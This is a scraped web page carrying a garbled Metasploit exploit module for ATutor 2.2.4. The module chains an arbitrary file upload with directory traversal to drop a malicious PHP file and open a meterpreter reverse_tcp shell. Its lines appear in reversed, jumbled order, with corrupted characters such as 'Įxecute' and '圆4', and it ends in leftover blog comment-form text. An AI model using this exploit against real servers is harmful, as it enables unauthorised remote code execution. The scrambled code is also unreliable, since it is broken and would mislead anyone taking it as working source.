Print_status("Executing payload via = 'linux'Įxecute_cmdstager(background: true, flavor: temp: './')Įxecute_cmdstager(background: true, flavor: The only way to know whether or not the exploit succeeded, is by checking if a session was created If that fails, it tries to exploit `Patcher` # The module first attempts to exploit `Import New Language`. # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function # NOTE: Automatic check is implemented by the AutoCheck mixin Print_good("Identified the target OS as #) When 'CentOS', 'Debian', 'Fedora', 'Ubuntu', = targetsįail_with(Failure::NoTarget, 'No valid target for target OS') Target_os = ('(').split(')')įail_with(Failure::NoTarget, 'Unable to determine target OS') unless target_os # Apache probably supports more OS keys, which can be added to the array # By default, the Apache server header reveals the target OS using one of the strings used as keys in the hash below # The ATutor documentation recommends installing it on a XAMPP server. Print_warning('Could not detect target OS.') 'WfsDelay' => 3 # If exploitation via `Import New Language` doesn't work, wait this long before attempting exploiting via `Patcher` 'PAYLOAD' => 'windows/圆4/meterpreter/reverse_tcp' 'PAYLOAD' => 'linux/圆4/meterpreter/reverse_tcp' Has been successfully tested against ATutor 2.2.4 running on Windows 10 Valid credentials for an ATutor admin account are required. Zip archive and attempts exploitation via `Patcher`. If no session is obtained, the module creates another The moduleįirst uploads the archive via `Import New Language` and then attempts toĮxecute the payload via an HTTP GET request to the PHP file in the root `Import New Language` function and the `Patcher` function. The zip archive can be uploaded via two vectors, the The PHP file contains anĮncoded payload that allows for remote command execution on the The zipĪrchive takes advantage of a directory traversal vulnerability that willĬause the PHP file to be dropped in the root server directory (`htdocs`įor Windows and `html` for Linux targets). It first creates a zip archive containing a malicious PHP file. This module exploits an arbitrary file upload vulnerability together withĪ directory traversal flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in Class MetasploitModule 'ATutor 2.2.4 - Directory Traversal / Remote Code Execution, ',
0 Comments
Leave a Reply. |